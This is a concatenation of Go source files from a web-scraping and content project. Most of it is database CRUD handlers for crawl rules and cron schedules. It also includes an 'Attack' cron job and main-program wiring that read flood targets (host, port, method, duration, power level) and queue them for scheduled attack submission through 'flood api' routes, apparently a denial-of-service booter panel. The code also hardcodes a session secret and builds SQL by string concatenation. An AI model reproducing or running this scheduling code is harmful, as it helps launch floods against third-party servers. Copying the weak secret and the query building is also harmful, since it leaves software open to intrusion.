rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
for rows.Next() {
if err := rows.Scan(&rule.Id, &rule.Uid, &rule.Name,
&rule.SpiderId, &rule.Url, &rule.SelectorStr, &rule.Status, &rule.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
if err := json.Unmarshal([]byte(rule.SelectorStr), &rule.Selector); err != nil {
log.Printf("json Unmarshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
rules = append(rules, rule)
}
if js, err = json.Marshal(rules); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func GetRule(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
rule Rule
js []byte
spUser user.SpStatUser
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = " a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
case user.GROUP_PRI_BAN:
con = " a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
default:
log.Printf("group private erros")
}
sqlStr := `select a.id, a.uid, a.name, a.spiderid, c.name, a.url, a.rule_json, a.status, a.logtime
from spider_rule a left join spider_manager c on a.spiderid = c.id where ` +
con + " a.id = ?"
stmtOut, err := db.Prepare(sqlStr)
id, _ := strconv.Atoi(r.PostFormValue("Id"))
rows, err := stmtOut.Query(id)
defer func () {
stmtOut.Close()
rows.Close()
}()
if err != nil {
log.Printf("%s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if rows.Next() {
if err := rows.Scan(&rule.Id, &rule.Uid, &rule.Name,&rule.SpiderId, &rule.Manager.Name, &rule.Url,
&rule.SelectorStr, &rule.Status, &rule.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
if err := json.Unmarshal([]byte(rule.SelectorStr), &rule.Selector); err != nil {
log.Printf("json Unmarshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
}
if js, err = json.Marshal(rule); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func EditRule(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
rule Rule
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&rule).Elem()
rValue := reflect.ValueOf(&rule).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknow type %s", p)
}
}
}
rule.Selector.Title, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Title")))
rule.Selector.Content, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Content")))
rule.Selector.Section, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Section")))
rule.Selector.Href, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Href")))
rule.Selector.Filter, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Filter")))
if len(rule.Selector.Title) <= 0 || len(rule.Selector.Content) <= 0 || len(rule.Selector.Section) <= 0 ||
len(rule.Name) <= 0 || len(rule.Url) <= 0 {
log.Printf("post From value [%s] is empty", "Title//Content//Section//Name//Url//Charset")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `update spider_rule set name = ?, spiderid = ?, url = ?,
rule_json = ?, status = ? where id = ? and uid = ?`
stmtIn, err := db.Prepare(sqlStr)
defer func () {
stmtIn.Close()
}()
if js, err = json.Marshal(rule.Selector); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err = stmtIn.Exec(rule.Name, rule.SpiderId, rule.Url, js,
rule.Status, rule.Id, spUser.Id); err != nil {
log.Printf("update spider rule fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func AddRule(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
rule Rule
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&rule).Elem()
rValue := reflect.ValueOf(&rule).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknow type %s", p)
}
}
}
rule.Selector.Title, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Title")))
rule.Selector.Content, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Content")))
rule.Selector.Section, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Section")))
rule.Selector.Href, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Href")))
rule.Selector.Filter, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Filter")))
if len(rule.Selector.Title) <= 0 || len(rule.Selector.Content) <= 0 || len(rule.Selector.Section) <= 0 ||
len(rule.Name) <= 0 || len(rule.Url) <= 0 {
log.Printf("post From value [%s] is empty", "Title//Content//Section//Name//Url//Charset")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `insert into spider_rule (uid, name, spiderid, url, rule_json, logtime)
values(?, ?, ?, ?, ?, ?)`
stmtIn, err := db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if js, err = json.Marshal(rule.Selector); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err := stmtIn.Exec(spUser.Id, rule.Name, rule.SpiderId, rule.Url, js,
time.Now().Format("2006-01-02 15:04:05")); err != nil {
log.Printf("stmtIn exec fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func GetRules(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
cfg *common.Cfg, session sessions.Session, ms []*user.SpStatMenu, render render.Render) {
var (
ruleRelation *RuleRelation
ruleRelations []*RuleRelation
menu []*user.SpStatMenu
spUser user.SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = "WHERE a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ")"
case user.GROUP_PRI_BAN:
con = "WHERE a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ")"
default:
log.Printf("group private erros")
}
for _, elem := range ms {
if (spUser.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM spider_rule a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
sqlStr := `select a.id, a.uid, b.username, a.name, a.spiderid, c.name, a.url, a.rule_json, a.status, a.logtime
from spider_rule a left join sp_user b on a.uid = b.id
left join spider_manager c on a.spiderid = c.id
` + con + `order by id desc limit ?, ?`
log.Printf("%s", sqlStr)
stmtOut, err = db.Prepare(sqlStr)
defer stmtOut.Close()
rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
defer rows.Close()
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
for rows.Next() {
ruleRelation = &RuleRelation{}
if err := rows.Scan(&ruleRelation.Rule.Id,&ruleRelation.Rule.Uid,
&ruleRelation.SpStatUser.UserName, &ruleRelation.Rule.Name,
&ruleRelation.Rule.SpiderId, &ruleRelation.Rule.Manager.Name,
&ruleRelation.Rule.Url, &ruleRelation.Rule.SelectorStr,
&ruleRelation.Rule.Status, &ruleRelation.Rule.Logtime); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
if err := json.Unmarshal([]byte(ruleRelation.Rule.SelectorStr), &ruleRelation.Rule.Selector); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
ruleRelations = append(ruleRelations, ruleRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*user.SpStatMenu
Result []*RuleRelation
Paginator *util.Paginator
User *user.SpStatUser
}{menu, ruleRelations, paginator, &spUser}
if path == "/" {
render.HTML(200, "ruleview", ret)
} else {
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
}<file_sep>package crontab
import (
"encoding/json"
"fmt"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
cron "github.com/jakecoffman/cron"
)
type Attack struct {
common.Ospider
Cfg
rmq.Queue
}
func NewAttack() *Attack {
return &Attack{}
}
func (self *Attack) Handler() {
c := cron.New()
subCron := cron.New()
subCron.Start()
self.Log.Println(self.FlushCron)
c.AddFunc(self.FlushCron, func() {
sqlStr := `select a.id, a.uid, a.url, a.host, a.port, a.method, a.time,
a.powerlevel, a.status, a.cronid, b.name, b.cron
from spider_flood_target a left join spider_crontab b on a.cronid = b.id`
stmtOut, err := self.Db.Prepare(sqlStr)
defer stmtOut.Close()
if err != nil {
self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
return
}
var (
attack handler.FloodTarget
)
rows, err := stmtOut.Query()
defer rows.Close()
if err != nil {
self.Log.Printf("stmtOut.Query fails %s", err)
return
}
for rows.Next() {
if err := rows.Scan(&attack.Id, &attack.Uid, &attack.Url, &attack.Host,
&attack.Port, &attack.Method, &attack.Time,
&attack.Powerlevel, &attack.Status, &attack.Crontab.Id,
&attack.Crontab.Name, &attack.Crontab.Cron); err != nil {
self.Log.Printf("rows.Scan fails %s", err)
return
}
attackJson, _ := json.Marshal(attack)
subCron.RemoveJob(fmt.Sprintf("%d", attack.Id))
if (attack.Status & 1) == 0 {
continue
}
subCron.AddFunc(attack.Crontab.Cron, func() {
self.Log.Println(attack.Crontab.Cron)
self.Log.Printf("%s", attackJson)
//写入redis队列
if !self.Publish(string(attackJson)) {
self.Log.Printf("put in task queue fails")
}
}, fmt.Sprintf("%d", attack.Id))
}
}, "initTask")
c.Start()
}
<file_sep>package handler
import (
"database/sql"
_"github.com/go-sql-driver/mysql"
"github.com/go-martini/martini"
"github.com/huzorro/ospider/web/user"
"net/http"
"log"
"github.com/martini-contrib/sessions"
"encoding/json"
"strings"
"strconv"
"reflect"
"net/url"
"github.com/martini-contrib/render"
"github.com/huzorro/ospider/util"
"time"
"github.com/huzorro/ospider/common"
)
type Crontab struct {
Id int64 `json:"id"`
Uid int64 `json:"uid"`
Name string `json:"name"`
Cron string `json:"cron"`
Status int64 `json:"status"`
Logtime string `json:"logtime"`
}
type CrontabRelation struct {
Crontab
user.SpStatUser
}
func GetCrontabsApi(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
crontab Crontab
crontabs []Crontab
js []byte
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
sqlStr := `select id, uid, name, cron, status, logtime from spider_crontab where status = 1`
stmtOut, err := db.Prepare(sqlStr)
rows, err := stmtOut.Query()
defer func () {
stmtOut.Close()
rows.Close()
}()
if err != nil {
log.Printf("%s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
for rows.Next() {
if err := rows.Scan(&crontab.Id, &crontab.Uid, &crontab.Name,
&crontab.Cron, &crontab.Status, &crontab.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
crontabs = append(crontabs, crontab)
}
if js, err = json.Marshal(crontabs); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func GetCrontab(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
crontab Crontab
js []byte
spUser user.SpStatUser
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = " a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
case user.GROUP_PRI_BAN:
con = " a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
default:
log.Printf("group private erros")
}
sqlStr := `select id, uid, name, cron, status, logtime
from spider_crontab where ` + con + " id = ?"
stmtOut, err := db.Prepare(sqlStr)
id, _ := strconv.Atoi(r.PostFormValue("Id"))
rows, err := stmtOut.Query(id)
defer func () {
stmtOut.Close()
rows.Close()
}()
if err != nil {
log.Printf("%s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if rows.Next() {
if err := rows.Scan(&crontab.Id, &crontab.Uid, &crontab.Name,
&crontab.Cron, &crontab.Status, &crontab.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
}
if js, err = json.Marshal(crontab); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func EditCrontab(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
crontab Crontab
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&crontab).Elem()
rValue := reflect.ValueOf(&crontab).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknow type %s", p)
}
}
}
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `update spider_crontab set name = ?, cron = ?, status = ?
where id = ? and uid = ?`
stmtIn, err := db.Prepare(sqlStr)
defer func () {
stmtIn.Close()
}()
if _, err = stmtIn.Exec(crontab.Name, crontab.Cron, crontab.Status, crontab.Id, spUser.Id); err != nil {
log.Printf("update crontab fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func AddCrontab(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
crontab Crontab
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&crontab).Elem()
rValue := reflect.ValueOf(&crontab).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknow type %s", p)
}
}
}
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `insert into spider_crontab (uid, name, cron, logtime)
values(?, ?, ?, ?)`
stmtIn, err := db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err := stmtIn.Exec(spUser.Id, crontab.Name, crontab.Cron, time.Now().Format("2006-01-02 15:04:05")); err != nil {
log.Printf("stmtIn exec fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func GetCrontabs(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
cfg *common.Cfg, session sessions.Session, ms []*user.SpStatMenu, render render.Render) {
var (
crontabRelation *CrontabRelation
crontabRelations []*CrontabRelation
menu []*user.SpStatMenu
spUser user.SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = "WHERE a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ")"
case user.GROUP_PRI_BAN:
con = "WHERE a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ")"
default:
log.Printf("group private erros")
}
for _, elem := range ms {
if (spUser.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM spider_crontab a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
sqlStr := `select a.id, a.uid, b.username, a.name, a.cron, a.status, a.logtime
from spider_crontab a left join sp_user b on a.uid = b.id
` + con + `order by id desc limit ?, ?`
log.Printf("%s", sqlStr)
stmtOut, err = db.Prepare(sqlStr)
defer stmtOut.Close()
rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
defer rows.Close()
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
for rows.Next() {
crontabRelation = &CrontabRelation{}
if err := rows.Scan(&crontabRelation.Crontab.Id,&crontabRelation.Crontab.Uid,
&crontabRelation.UserName, &crontabRelation.Name, &crontabRelation.Cron,
&crontabRelation.Crontab.Status, &crontabRelation.Crontab.Logtime); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
crontabRelations = append(crontabRelations, crontabRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*user.SpStatMenu
Result []*CrontabRelation
Paginator *util.Paginator
User *user.SpStatUser
}{menu, crontabRelations, paginator, &spUser}
if path == "/" {
render.HTML(200, "crontabview", ret)
} else {
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
}<file_sep># ospider
[](https://semaphoreci.com/huzorro/ospider)
<file_sep>package common
import (
"database/sql"
"github.com/huzorro/spfactor/sexredis"
"log"
)
type Ospider struct {
Log *log.Logger
P *sexredis.RedisPool
Db *sql.DB
}
type Cfg struct {
//数据库类型
Dbtype string `json:"dbtype"`
//数据库连接uri
Dburi string `json:"dburi"`
//页宽
PageSize int64 `json:"pageSize"`
//任务队列
TaskQueueName string `json:"taskQueueName"`
//结果队列
ResultQueueName string `json:"resultQueueName"`
//attack
AttackQueueName string `json:"attackQueueName"`
//queue unacked limit
UnackedLimit int `json:"unackedLimit"`
//queue consumer num
NumConsumers int `json:"numConsumers"`
//cache
CacheExpire uint64 `json:"cacheExpire"`
}
type Result struct {
Title string `json:"title"`
Content string `json:"content"`
}
type Processor interface {
Process(payload string)
}
<file_sep>package main
import (
"database/sql"
"flag"
"html/template"
"log"
"os"
"github.com/go-martini/martini"
_ "github.com/go-sql-driver/mysql"
"github.com/gosexy/redis"
"github.com/huzorro/ospider/util"
"github.com/huzorro/ospider/web/user"
"github.com/huzorro/spfactor/sexredis"
"github.com/huzorro/woplus/tools"
"github.com/martini-contrib/render"
"github.com/martini-contrib/sessions"
// "github.com/adjust/redismq"
"net/http"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/cms"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/crontab"
"github.com/huzorro/ospider/attack"
"github.com/huzorro/ospider/spider/processor"
"github.com/huzorro/ospider/web/handler"
)
func main() {
portPtr := flag.String("port", ":10086", "service port")
redisIdlePtr := flag.Int("redis", 20, "redis idle connections")
dbMaxPtr := flag.Int("db", 10, "max db open connections")
//config path
cfgPathPtr := flag.String("config", "config.json", "config path name")
//web
webPtr := flag.Bool("web", false, "web sm start")
//crontab
cronTaskPtr := flag.Bool("cron", false, "crontab task")
//attack crontab
ca := flag.Bool("ca", false, "attack crontab")
//reset crontab
reset := flag.Bool("reset", false, "reset crontab")
//attack
attackPtr := flag.Bool("attack", false, "attack task")
//spider
spiderPtr := flag.Bool("spider", false, "spider start")
//restful
restfulPtr := flag.Bool("restful", false, "restful start")
//template path
templatePath := flag.String("template", "templates", "template path")
//Static path
staticPath := flag.String("static", "public", "Static path")
flag.Parse()
//json config
var (
// cfg user.Cfg
// cfg crontab.Cfg
cfg processor.Cfg
mtn *martini.ClassicMartini
redisPool *sexredis.RedisPool
db *sql.DB
err error
)
if err := tools.Json2Struct(*cfgPathPtr, &cfg); err != nil {
log.Printf("load json config fails %s", err)
panic(err.Error())
}
logger := log.New(os.Stdout, "\r\n", log.Ldate|log.Ltime|log.Lshortfile)
redisPool = &sexredis.RedisPool{Connections: make(chan *redis.Client, *redisIdlePtr), ConnFn: func() (*redis.Client, error) {
client := redis.New()
err := client.Connect("localhost", uint(6379))
return client, err
}}
db, err = sql.Open(cfg.Dbtype, cfg.Dburi)
db.SetMaxOpenConns(*dbMaxPtr)
if err != nil {
panic(err.Error()) // Just for example purpose. You should use proper error handling instead of panic
}
mtn = martini.Classic()
mtn.Use(martini.Static(*staticPath))
mtn.Map(logger)
mtn.Map(redisPool)
mtn.Map(db)
cache := &user.Cache{DB: db, Pool: redisPool}
mtn.Map(cache)
// load rbac node
if nMap, err := cache.RbacNodeToMap(); err != nil {
logger.Printf("rbac node to map fails %s", err)
} else {
mtn.Map(nMap)
}
//load rbac menu
if ms, err := cache.RbacMenuToSlice(); err != nil {
logger.Printf("rbac menu to slice fails %s", err)
} else {
mtn.Map(ms)
}
//session
store := sessions.NewCookieStore([]byte("secret123"))
mtn.Use(sessions.Sessions("Qsession", store))
//render
rOptions := render.Options{}
rOptions.Extensions = []string{".tmpl", ".html"}
rOptions.Directory = *templatePath
rOptions.Funcs = []template.FuncMap{util.FuncMaps}
mtn.Use(render.Renderer(rOptions))
mtn.Map(&cfg.Cfg.Cfg)
if *cronTaskPtr {
cronTask := crontab.New()
cronTask.Cfg = cfg.Cfg
// taskQueue := redismq.CreateQueue("localhost", "6379", "", 0, cfg.TaskQueueName)
connection := rmq.OpenConnection("cron_producer", "tcp", "localhost:6379", 0)
cronTask.Ospider = common.Ospider{Log: logger, P: redisPool, Db: db}
cronTask.Queue = connection.OpenQueue(cfg.TaskQueueName)
cronTask.Handler()
// cronTask := &crontab.Task{common.Ospider{Log:logger, P:redisPool, Db:db}, cfg}
}
if *ca {
attackCron := crontab.NewAttack()
attackCron.Cfg = cfg.Cfg
pconnection := rmq.OpenConnection("attack_producer", "tcp", "localhost:6379", 0)
attackCron.Ospider = common.Ospider{Log: logger, P: redisPool, Db: db}
attackCron.Queue = pconnection.OpenQueue(cfg.AttackQueueName)
attackCron.Handler()
}
if *reset {
restCron := crontab.NewRest()
restCron.Cfg = cfg.Cfg
restCron.Ospider = common.Ospider{Log: logger, P: redisPool, Db: db}
restCron.Handler()
}
if *attackPtr {
cconnection := rmq.OpenConnection("attack_consumer", "tcp", "localhost:6379", 0)
co := common.Ospider{Log: logger, P: redisPool, Db: db}
processors := make([]common.Processor, 0)
result := &attack.Task{cfg, co, cconnection, processors}
result.AddProcessor(attack.NewAttackSubmit(co)).AddProcessor(attack.NewUpdateHost(co))
result.Handler()
}
if *spiderPtr {
//spider
// server := redismq.NewServer("localhost", "6379", "", 0, "9999")
// server.Start()
// taskQueue := redismq.CreateQueue("localhost", "6379", "", 0, cfg.TaskQueueName)
connection := rmq.OpenConnection("task_consumer&link_producer", "tcp", "localhost:6379", 0)
task := &processor.Task{cfg, common.Ospider{Log: logger, P: redisPool, Db: db}, connection}
task.Handler()
// resultQueue := redismq.CreateQueue("localhost", "6379", "", 0, cfg.ResultQueueName)
connectionLinkResult := rmq.OpenConnection("link_consumer&result_producer", "tcp", "localhost:6379", 0)
result := &processor.TaskContent{cfg, common.Ospider{Log: logger, P: redisPool, Db: db}, connectionLinkResult}
result.Handler()
}
if *restfulPtr {
connection := rmq.OpenConnection("result_consumer", "tcp", "localhost:6379", 0)
co := common.Ospider{Log: logger, P: redisPool, Db: db}
processors := make([]common.Processor, 0)
result := &cms.Task{cfg, co, connection, processors}
result.AddProcessor(cms.NewCommitMysql(co)).AddProcessor(cms.NewCommitRestful(co))
result.Handler()
}
if *webPtr {
//rbac filter
rbac := &user.RBAC{}
mtn.Use(rbac.Filter())
mtn.Get("/login", func(r render.Render) {
r.HTML(200, "login", "")
})
mtn.Get("/logout", user.Logout)
mtn.Post("/login/check", user.LoginCheck)
//user
mtn.Post("/user/view", user.ViewUserAction)
mtn.Get("/usersview", user.ViewUsersAction)
mtn.Post("/user/add", user.AddUserAction)
mtn.Post("/user/edit", user.EditUserAction)
//spider manager
mtn.Get("/", handler.GetSites)
mtn.Post("/spider/one", handler.GetSpider)
mtn.Post("/spider/edit", handler.EditSpider)
mtn.Post("/spider/add", handler.AddSpider)
mtn.Get("/spiderview", handler.GetSpiders)
//spider restful
mtn.Post("/api/spiders", handler.GetSpidersApi)
//spider crontab
mtn.Get("/crontabview", handler.GetCrontabs)
mtn.Post("/crontab/one", handler.GetCrontab)
mtn.Post("/crontab/edit", handler.EditCrontab)
mtn.Post("/crontab/add", handler.AddCrontab)
//crontab restful
mtn.Post("/api/crontabs", handler.GetCrontabsApi)
//spider rule
mtn.Get("/ruleview", handler.GetRules)
mtn.Post("/rule/one", handler.GetRule)
mtn.Post("/rule/edit", handler.EditRule)
mtn.Post("/rule/add", handler.AddRule)
//rule restful
mtn.Post("/api/rules", handler.GetRulesApi)
//spider site
mtn.Get("/siteview", handler.GetSites)
mtn.Post("/site/one", handler.GetSite)
mtn.Post("/site/edit", handler.EditSite)
mtn.Post("/site/add", handler.AddSite)
//flood api
mtn.Get("/floodapiview", handler.GetFloods)
mtn.Post("/floodapi/one", handler.GetFloodApi)
